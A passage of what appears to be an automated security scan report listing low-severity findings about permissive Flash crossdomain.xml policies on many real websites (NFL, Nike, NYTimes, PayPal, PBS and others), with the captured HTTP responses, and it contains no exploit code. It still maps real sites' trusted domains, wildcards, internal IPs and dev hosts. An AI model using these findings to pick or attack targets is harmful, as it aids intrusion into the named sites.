HTTP/1.0 200 OK Accept-Ranges: bytes ETag: W/"3359-1301521068000" Last-Modified: Wed, 30 Mar 2011 21:37:48 GMT Content-Type: application/xml Content-Length: 3359 Cache-Control: max-age=229 Expires: Sat, 02 Apr 2011 13:28:48 GMT Date: Sat, 02 Apr 2011 13:24:59 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.nfl.com" /> <allow-access-from domain="nfl.com" /> <allow-access-from domain="*.gsislive.com" /> <allow-access-from domain="*.superbowl.com" /> <allow-access-from domain="superbowl.com" /> <allow-access-from domain="clearspring.com" /> <allow-access-from domain="*.clearspring.com" /> <allow-access-from domain="*.2mdn.net" /> <allow-access-from domain="66.192.35.242" /> <allow-access-from domain="10.36.202.66" /> <allow-access-from domain="192.150.10.200" /> <allow-access-from domain="192.150.11.4" /> <allow-access-from domain="192.150.8.7" /> <allow-access-from domain="192.150.8.184" /> <allow-access-from domain="192.150.4.10" /> <allow-access-from domain="192.150.5.2" /> <allow-access-from domain="192.150.5.150" /> <allow-access-from domain="*.nfln.com" /> <allow-access-from domain="*.nflnetworkaffiliates <allow-access-from domain="nfln.tierradev.com" /> <allow-access-from domain="nfl.vmdataservices.com" /> <allow-access-from domain="nfl2.vmdataservices.com" /> <allow-access-from domain="smb.cdn.neulion.com" /> <allow-access-from domain="nfl.cdnl3.neulion.net" /> <allow-access-from domain="*.myspacecdn.com"/> <allow-access-from domain="*.myspace.com"/> <allow-access-from domain="*.nfllabor.com"/> <allow-access-from domain="nfllabor.com"/> <allow-access-from domain="*.buffalobills.com"/> <allow-access-from domain="*.seahawks.com"/> <allow-access-from domain="*.panthers.com"/> <allow-access-from domain="*.chargers.com"/> <allow-access-from domain="*.bengals.com"/> <allow-access-from domain="*.titansonline.com"/> <allow-access-from domain="*.azcardinals.com"/> <allow-access-from domain="*.49ers.com"/> <allow-access-from domain="*.raiders.com"/> <allow-access-from domain="*.steelers.com"/> <allow-access-from domain="*.vikings.com"/> <allow-access-from domain="*.kcchiefs.com"/> <allow-access-from domain="*.detroitlions.com"/> <allow-access-from domain="*.miamidolphins.com"/> <allow-access-from domain="*.patriots.com"/> <allow-access-from domain="*.newyorkjets.com"/> <allow-access-from domain="*.baltimoreravens.com"/> <allow-access-from domain="*.clevelandbrowns.com"/> <allow-access-from domain="*.houstontexans.com"/> <allow-access-from domain="*.colts.com"/> <allow-access-from domain="*.jaguars.com"/> <allow-access-from domain="*.denverbroncos.com"/> <allow-access-from domain="*.dallascowboys.com"/> <allow-access-from domain="*.giants.com"/> <allow-access-from domain="*.philadelphiaeagles.com"/> <allow-access-from domain="*.redskins.com"/> <allow-access-from domain="*.chicagobears.com"/> <allow-access-from domain="*.packers.com"/> <allow-access-from domain="*.atlantafalcons.com"/> <allow-access-from domain="*.neworleanssaints.com"/> <allow-access-from domain="*.buccaneers.com"/> <allow-access-from domain="*.stlouisrams.com"/> <allow-access-from domain="yui.yahooapis.com"/> <allow-access-from domain="neulion.vo.llnwd.net"/> <allow-access-from domain="neulion.hs.llnwd.net"/> <allow-access-from domain="*.cdnl3.neulion.com"/> <allow-access-from domain="secure.footprint.net"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.nhl.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.nhl.com |
HTTP/1.0 200 OK ETag: "b6b86a-305-4957cdda67680 Server: Apache Last-Modified: Sat, 20 Nov 2010 14:30:34 GMT Accept-Ranges: bytes Content-Length: 773 Content-Type: application/xml Date: Sat, 02 Apr 2011 14:19:24 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="nhl.com" /> <allow-access-from domain="*.nhl.com" /> <allow-access-from domain="nhl.cdn.neulion.net" /> <allow-access-from domain="smb.cdn.neulion.com" /> <allow-access-from domain="neulion.vo.llnwd.net" /> <allow-access-from domain="neulion.hs.llnwd.net" /> <allow-access-from domain="*.cdnl3.neulion.com" /> <allow-access-from domain="secure.footprint.net" /> <allow-access-from domain="localhost" /> <allow-access-from domain="*.myspacecdn.com"/> <allow-access-from domain="*.hersheycanada.com"/> <allow-access-from domain="*.draftfcbdigital.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.nike.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.nike.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Wed, 08 Dec 2010 19:51:18 GMT ETag: "112f-496eb71d35980" Content-Type: application/xml Cache-Control: max-age=10116 Expires: Sat, 02 Apr 2011 16:33:15 GMT Date: Sat, 02 Apr 2011 13:44:39 GMT Content-Length: 4399 Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="nikeid.nike.com" secure="false" /> <allow-access-from domain="env1-brand.nike.com" secure="false"/> <allow-access-from domain="env2-nikeid.nike.com" secure="false"/> ...[SNIP]... <allow-access-from domain="nike.com" secure="false"/> ...[SNIP]... <allow-access-from domain="nikewomen.nike.com" secure="false"/> ...[SNIP]... <allow-access-from domain="nikeid-europe.nike.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nike.com" secure="false"/> ...[SNIP]... <allow-access-from domain="www.dyestat.com"/> <allow-access-from domain="dyestat.com"/> <allow-access-from domain="*.nikeacg.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.nike.com.au" secure="false" /> ...[SNIP]... <allow-access-from domain="*.nike.co.nz" secure="false" /> ...[SNIP]... <allow-access-from domain="*.niketown.nike.com" secure="false" /> ...[SNIP]... <allow-access-from domain="au.yahoo.com" secure="false" /> ...[SNIP]... <allow-access-from domain="advision.webevents.yahoo ...[SNIP]... <allow-access-from domain="nike.jp" secure="false" /> ...[SNIP]... <allow-access-from domain="*.nike.jp" secure="false" /> ...[SNIP]... <allow-access-from domain="*.growingroster.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.redcated" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/> ...[SNIP]... <allow-access-from domain="nikerunning.nike.com" secure="false" /> ...[SNIP]... <allow-access-from domain="nikeplus.nike.com" secure="false" /> ...[SNIP]... <allow-access-from domain="web.splashcast.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.immersivemedia.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.imc.cachefly.net" secure="false" /> ...[SNIP]... <allow-access-from domain="nike-dev2.ny.rga.com" secure="false"/> ...[SNIP]... <allow-access-from domain="nike-dev3.ny.rga.com" secure="false"/> ...[SNIP]... <allow-access-from domain="nike-dev4.ny.rga.com" secure="false"/> ...[SNIP]... <allow-access-from domain="nike-dev5.ny.rga.com" secure="false"/> ...[SNIP]... <allow-access-from domain="nike-dev6.ny.rga.com" secure="false"/> ...[SNIP]... <allow-access-from domain="gigyahosting1.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.gigya.s3.amazonaws.com" secure="false"/> ...[SNIP]... <allow-access-from domain="msnbanner.arcww.it" secure="false" /> ...[SNIP]... <allow-access-from domain="www.sportchalet.com" secure="false"/> ...[SNIP]... <allow-access-from domain="sportchalet.com" secure="false"/> ...[SNIP]... <allow-access-from domain="www.jdsports.co.uk"/> <allow-access-from domain="cdn.nimblefish.com" secure="false"/> ...[SNIP]... <allow-access-from domain="media.nimblefish.com" secure="false"/> ...[SNIP]... <allow-access-from domain="nv.nimblefish.com" secure="false"/> ...[SNIP]... <allow-access-from domain="app.nimblefish.com" secure="false"/> ...[SNIP]... <allow-access-from domain="media.beta01.nimblefish ...[SNIP]... <allow-access-from domain="nv.beta01.nimblefish.com" secure="false"/> ...[SNIP]... <allow-access-from domain="app.beta01.nimblefish.com" secure="false"/> ...[SNIP]... <allow-access-from domain="media.content01 ...[SNIP]... <allow-access-from domain="nv.content01.nimblefish ...[SNIP]... <allow-access-from domain="app.content01.nimblefish ...[SNIP]... <allow-access-from domain="*.schuelervz.net"/> <allow-access-from domain="*.studivz.net"/> <allow-access-from domain="*.meinvz.net"/> <allow-access-from domain="gigya.s3.amazonaws.com"/> <allow-access-from domain="gigyahosting1.com"/> <allow-access-from domain="admin.brightcove.com" secure="false"/> ...[SNIP]... <allow-access-from domain="s101573.gridserver.com" secure="false"/> ...[SNIP]... <allow-access-from domain="nike-prox-ecn18.ny.rga <allow-access-from domain="nike-prox-ecn10.ny.rga <allow-access-from domain="nikedev.blastradius.com" secure="false" /> ...[SNIP]... <allow-access-from domain="nike-qa.blastradius.com" secure="false" /> ...[SNIP]... <allow-access-from domain="kobe.nike.jess3.com" secure="false" /> ...[SNIP]... <allow-access-from domain="www.facebook.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.npr.org |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.npr.org |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:43:59 GMT Server: Apache/2.2.14 (Unix) Last-Modified: Mon, 02 Nov 2009 20:35:41 GMT Accept-Ranges: bytes Content-Length: 355 Cache-Control: max-age=600 Expires: Sat, 02 Apr 2011 13:53:59 GMT Keep-Alive: timeout=10, max=4978 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.threespot.com"/> <allow-access-from domain="*.npr.org" /> <allow-access-from domain="*.digitaria.com"/> <allow-access-from domain="www.kqed.org" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.nwsource.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.nwsource.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Tue, 12 May 2009 17:33:00 GMT ETag: "3ee92-154-7c794b00" Accept-Ranges: bytes Content-Length: 340 Content-Type: application/xml Expires: Sat, 02 Apr 2011 13:34:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 13:34:02 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="local.ads.nwsource.com" /> <allow-access-from domain="*.brightcove.com" /> <allow-access-from domain="*.googlesyndication.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.nypost.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.nypost.com |
HTTP/1.0 200 OK Server: Apache/2.2.3 (Red Hat) Last-Modified: Thu, 13 May 2010 18:51:22 GMT ETag: "c38038-a4-4867e3ea75e80" Accept-Ranges: bytes Content-Length: 164 Content-Type: text/xml Date: Sat, 02 Apr 2011 13:38:59 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.nypost.com" /> <allow-access-from domain="*.doubleclick.net" /> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.nytimes.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.nytimes.com |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 02 Apr 2011 12:43:14 GMT Content-length: 1169 Content-type: text/xml Set-cookie: RMID=3280aa5b17b64d9 Last-modified: Wed, 21 Jul 2010 15:01:34 GMT Accept-ranges: bytes Connection: keep-alive <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.*.nytimes.com" /> <allow-access-from domain="*.nytimes.com" /> <allow-access-from domain="*.nytvideo.feedroom.com" /> <allow-access-from domain="*.www.feedroom.com" /> <allow-access-from domain="*.chumby.com" /> <allow-access-from domain="*.createthe.com" /> <allow-access-from domain="*.predictify.com" /> <allow-access-from domain="*.brightcove.com" /> <allow-access-from domain="*.*.brightcove.com" /> <allow-access-from domain="*.nytsyndicate.com"/> <allow-access-from domain="*.*.nytsyndicate.com"/> <allow-access-from domain="xdce.adobe.com" /> <allow-access-from domain="www.rokkandev.com" /> <allow-access-from domain="cdn.eyewonder.com" /> <allow-access-from domain="apps.eyewonderlabs.com" /> <allow-access-from domain="media.pointroll.com" /> <allow-access-from domain="speed.pointroll.com" /> <allow-access-from domain="u-sta.unicast.com"/> <allow-access-from domain="creativeby1.unicast.com"/> <allow-access-from domain="creativeby2.unicast.com"/> <allow-access-from domain="picklegroup.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.opentable.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.opentable.com |
HTTP/1.1 200 OK Content-Length: 428 Content-Type: text/xml Last-Modified: Tue, 15 Mar 2011 18:49:20 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO PSA OUR" X-OpenTableHost: SC-NA-WEB-05 X-Powered-By: ASP.NET PICS-Label: (PICS-1.0 "http://www.rsac.org Date: Sat, 02 Apr 2011 13:45:16 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.eyewonder.com" /> <allow-access-from domain="eyewonder.com" /> <allow-access-from domain="*.eyewonder.com" /> <allow-access-from domain="eyewonderlabs.com" /> <allow-access-from domain="*.eyewonderlabs.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.opera.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.opera.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:03:17 GMT Server: Apache Last-Modified: Tue, 03 Aug 2010 10:18:41 GMT ETag: "30002974-127-48ce8a Accept-Ranges: bytes Content-Type: text/xml; charset=utf-8 Content-Length: 142 Vary: Accept-Encoding Connection: close <?xml version="1.0" encoding="utf-8"?> <cross-domain-policy> <allow-access-from domain="*.opera.com" secure="true"/> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.opinionshere |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.opinionshere.com |
HTTP/1.1 200 OK Set-Cookie: opinions_here=a500242$50 Content-Type: text/xml Last-Modified: Mon, 29 Nov 2010 15:24:56 GMT Accept-Ranges: bytes ETag: "dfbc2094d98fcb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 14:01:35 GMT Connection: close Content-Length: 696 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.otxresearch.com" /> <allow-access-from domain="*.vo-id.com" /> <allow-access-from domain="*.surveymatch.com" /> <allow-access-from domain="*.rsxportal.com" /> ...[SNIP]... <allow-access-from domain="*.opinionshere.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.oprah.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.oprah.com |
HTTP/1.0 200 OK Server: Apache P3P: policyref="http://www Cteonnt-Length: 356 Content-Type: text/xml Cache-Control: max-age=900 Date: Sat, 02 Apr 2011 13:35:56 GMT Content-Length: 356 Connection: close Set-Cookie: SSLB=0; path=/; domain=.oprah.com Set-Cookie: check_loc=US; expires=Sun, 03-Apr-2011 13:35:56 GMT; path=/ <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.oprah.com" secure="false" /> <allow-access-from domain="*.harpo.com" secure="false" /> <allow-http-request ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.oracle.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.oracle.com |
HTTP/1.0 200 OK Last-Modified: Sun, 13 Mar 2011 22:39:04 GMT ETag: "4e01a6-2f2-49e64dcbaf200 Content-Type: application/xml Content-Language: en Server: Oracle-Application-Server Date: Sat, 02 Apr 2011 13:40:06 GMT Content-Length: 754 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.oracle.com" /> <allow-access-from domain="oracle.com"/> ...[SNIP]... <allow-access-from domain="presenter.oracle.com"/> <allow-access-from domain="streaming.oracle.com"/> <allow-access-from domain="web148.oracle.com"/> <allow-access-from domain="http://72.47.210.156"/> <allow-access-from domain="http://216.70.88.224"/> <allow-access-from domain="events-mktas.oracle.com"/> <allow-access-from domain="events-mktap.oracle.com"/> <allow-access-from domain="eventreg.oracle.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.ourstage.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.ourstage.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:33:46 GMT Server: haproxy Last-Modified: Fri, 03 Jul 2009 01:23:45 GMT ETag: "10255-114-46dc301e9ea40" Accept-Ranges: bytes Content-Length: 276 Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.ourstage.com" /> <site-con ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.overstock.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.overstock.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:23:29 GMT Server: Apache Last-Modified: Thu, 16 Dec 2010 06:09:38 GMT Accept-Ranges: bytes Content-Length: 230 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/x-cross-domain X-Pad: avoid browser bug <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.overstock.com"/> <allow-access-from domain="*.ostkcdn.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pandora.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.pandora.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 12:38:06 GMT Server: Apache Last-Modified: Tue, 29 Mar 2011 22:14:31 GMT ETag: "127-49fa66264bfc0" Accept-Ranges: bytes Content-Length: 295 Cache-Control: max-age=-224615 Expires: Wed, 30 Mar 2011 22:14:31 GMT Vary: Accept-Encoding Keep-Alive: timeout=15, max=65 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.pandora.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.mediapromoter.net" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.parentsconnect |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.parentsconnect.com |
HTTP/1.0 200 OK Server: Apache/2.0.63 (Unix) mod_jk/1.2.27 Last-Modified: Tue, 30 Nov 2010 17:54:05 GMT ETag: "4ad4016-1d7-49648df Accept-Ranges: bytes Content-Length: 471 Content-Type: application/xml Cache-Control: max-age=600 Date: Sat, 02 Apr 2011 13:36:38 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.mtvi.com"/> <allow-access-from domain="*.peanut-d.mtvi.com"/> <allow-access-from domain="*.peanut-q.mtvi.com"/> <allow-access-from domain="*.parentsconnect.com"/> <allow-access-from domain="*.mtvnservices.com"/> <allow-access-from domain="viacom.fcod.llnwd.net"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.partypoker.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.partypoker.com |
HTTP/1.1 200 OK Server: Apache Last-Modified: Wed, 16 Feb 2011 17:55:42 GMT Accept-Ranges: bytes Cache-Control: max-age=0 Expires: Sat, 02 Apr 2011 03:05:43 GMT pics-label: (pics-1.1 "http://www.icra.org Keep-Alive: timeout=5, max=91 Content-Type: text/xml Connection: Keep-Alive Date: Sat, 02 Apr 2011 03:05:43 GMT Age: 0 Content-Length: 440 <cross-domain-policy> <allow-access-from domain="www.partypoker <allow-access-from domain="videos.partypoker.com" secure="true"/> <allow-access-from domain="*rss.partypoker.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.partypoker.com" secure="true"/> <allow-access-from domain="en-new-partypoker.dev" secure="true"/> <allow-access-from domain="maxymiser.hs.llnwd.net/*" secure="true"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.paypal.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.paypal.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 12:37:42 GMT Server: Apache Last-Modified: Tue, 10 Jun 2008 20:10:41 GMT Accept-Ranges: bytes Content-Length: 312 Vary: Accept-Encoding Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.paypal.com" /> <allow-access-from domain="*.ebay.com" /> <allow-access-from domain="*.paypalobjects.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pbs.org |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.pbs.org |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:35:25 GMT Server: Apache/2.2.17 (Unix) Set-Cookie: www.apache.sid=1860a Accept-Ranges: bytes Content-Length: 1204 Connection: close Content-Type: text/xml X-Pad: avoid browser bug <cross-domain-policy> <allow-access-from domain="*.pbs.org"/> <allow-access-from domain="*.pbskids.org"/> <allow-access-from domain="www-tc.pbs.org"/> <allow-access-from domain="www.pb ...[SNIP]... <allow-access-from domain="pbskids.org"/> <allow-access-from domain="www-tc.pbskids.org"/> <allow-access-from domain="wrpx.service.mirror-image ...[SNIP]... <allow-access-from domain="*.tribalnova.com"/> <allow-access-from domain="*.pbskidsplay.org"/> <allow-access-from domain="*.theplatform.com"/> <allow-access-from domain="dipsy.pbs.org"/> <allow-access-from domain="*.chumby.com"/> <allow-access-from domain="209.98.43.18"/> <allow-access-from domain="174.129.32.152"/> <allow-access-from domain="widgets.pbs.org"/> ...[SNIP]... <allow-access-from domain="174.129.43.74"/> <allow-access-from domain="ec2-184-73-243-168 ...[SNIP]... <allow-access-from domain="*.comcastcim.edgesuite <allow-access-from domain="*edgesuite.net" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pch.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.pch.com |
HTTP/1.1 200 OK Content-Length: 462 Content-Type: text/xml Last-Modified: Fri, 04 Jun 2010 19:30:08 GMT Accept-Ranges: bytes ETag: "a5bd4d571c4cb1:900" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:27:30 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-http-request ...[SNIP]... <allow-access-from domain="*.pch.com"/> <allow-access-from domain="a1708.g.akamai.net"/> <allow-access-from domain="*.aghtd.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pchlotto.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.pchlotto.com |
HTTP/1.0 200 OK Server: Apache/2.2.3 (Red Hat) Last-Modified: Thu, 04 Nov 2010 21:30:54 GMT ETag: "ab4b74-1d7-49440df6b1f80 Accept-Ranges: bytes Content-Length: 471 Content-Type: text/xml Date: Sat, 02 Apr 2011 14:05:18 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia omain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*.pch.com"/> <allow-access-from domain="*.*.pch.com"/> <allow-access-from domain="a1708.g.akamai.net"/> <allow-access-from domain="*.aghtd.com"/> <allow-access-from domain="164.109.104.3" to-ports="*"/> ...[SNIP]... <allow-access-from domain="www.continuumjournals.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.petfinder.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.petfinder.com |
HTTP/1.0 200 OK Server: Apache/2.2.4 (Unix) mod_apreq2-20051231/2.6.0 mod_perl/2.0.3 Perl/v5.8.5 Last-Modified: Wed, 28 Jul 2010 18:49:30 GMT Accept-Ranges: bytes Content-Length: 382 Content-Type: application/xml Expires: Sat, 02 Apr 2011 13:38:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 13:38:20 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.discovery.com" /> <allow-access-from domain="www.bakerandhill.com" /> <allow-access-from domain="www.bakerandhillapps.com" /> <allow-access-from domain="*.draftfcb.info" /> <allow-access-from domain="*.theshelterpetproject <allow-access-from domain="*.petfinder.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.petside.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.petside.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Mon, 16 Mar 2009 14:55:40 GMT ETag: "b61105-c4-4653da4d9f300" Content-Type: application/xml Cache-Control: max-age=60 Expires: Sat, 02 Apr 2011 13:44:41 GMT Date: Sat, 02 Apr 2011 13:43:41 GMT Content-Length: 196 Connection: close <?xml version="1.0"?> <!-- crossdomain.xml --> <cross-domain-policy> <allow-access-from domain="*.nbcuni.com"/> <allow-access-from domain="widgets.nbcuni.com"/> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.petsmart.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.petsmart.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:50:32 GMT Server: Apache/2.0.63 (Unix) Last-Modified: Thu, 08 May 2008 01:49:36 GMT ETag: "53c78d-30d-44cae4b2b6c00 Accept-Ranges: bytes Content-Length: 781 Cache-Control: max-age=172800 Expires: Mon, 04 Apr 2011 13:50:32 GMT Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.petsmart.com" secu ...[SNIP]... <allow-access-from domain="*.petsmart.com" secure="true" /> ...[SNIP]... <allow-access-from domain="pet.imageg.net" /> <allow-access-from domain="*.gspt.net" secure="true" /> ...[SNIP]... <allow-access-from domain="*.gsipartners.com" secure="true" /> ...[SNIP]... <allow-access-from domain="172.20.1.172" /> <allow-access-from domain="172.21.1.172" /> <allow-access-from domain="206.16.220.172" /> <allow-access-from domain="63.240.110.172" /> <allow-access-from domain="preview.gsipartners.com" secure="true" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pga.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.pga.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:51:44 GMT Server: Apache Last-Modified: Mon, 21 Mar 2011 15:23:54 GMT Accept-Ranges: bytes Content-Length: 2034 Content-Type: application/xml Cache-Control: max-age=120 Expires: Sat, 02 Apr 2011 13:53:44 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.pga. ...[SNIP]... <allow-access-from domain="pga.com"/> <allow-access-from domain="i.pga.com"/> <allow-access-from domain="*.pga.com"/> <allow-access-from domain="beta.pga.com"/> <allow-access-from domain="ads.pga.com"/> <allow-access-from domain="www.pgatour.com"/> <allow-access-from domain="pgatour.com"/> <allow-access-from domain="i.pgatour.com"/> <allow-access-from domain="tourfeeds.pga.com"/> <allow-access-from domain="*.pgatour.com"/> <allow-access-from domain="*.rydercup.com"/> <allow-access-from domain="*.cnn.com"/> <allow-access-from domain="*.turner.com"/> <allow-access-from domain="*.cnn.net"/> <allow-access-from domain="*.doubleclick.net" secure="false"/> ...[SNIP]... <allow-access-from domain="ad.doubleclick.net" secure="false"/> ...[SNIP]... <allow-access-from domain="creatives.doubleclick.net"/> <allow-access-from domain="m.2mdn.net"/> <allow-access-from domain="m2.2mdn.net"/> <allow-access-from domain="*.2mdn.net"/> <allow-access-from domain="*.i-traffic.com"/> <allow-access-from domain="ar.atwola.com"/> <allow-access-from domain="*.itraffic.com"/> <allow-access-from domain="*.agency.com"/> <allow-access-from domain="*.aol.com"/> <allow-access-from domain="*.time.com"/> <allow-access-from domain="*.VillageVoice.com"/> <allow-access-from domain="*.nymag.com"/> <allow-access-from domain="*. salon.com"/> <allow-access-from domain="*.secondthought.com"/> <allow-access-from domain="*.clk4.com"/> <allow-access-from domain="servedby.advertising.com"/> <allow-access-from domain="bannerfarm.advertising <allow-access-from domain="*.advertising.com"/> <allow-access-from domain="*.crewintegrated.com"/> <allow-access-from domain="gfx.klipmart.com"/> <allow-access-from domain="*.klipmart.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pgatour.com |
Path: | /crossdomain.xml |
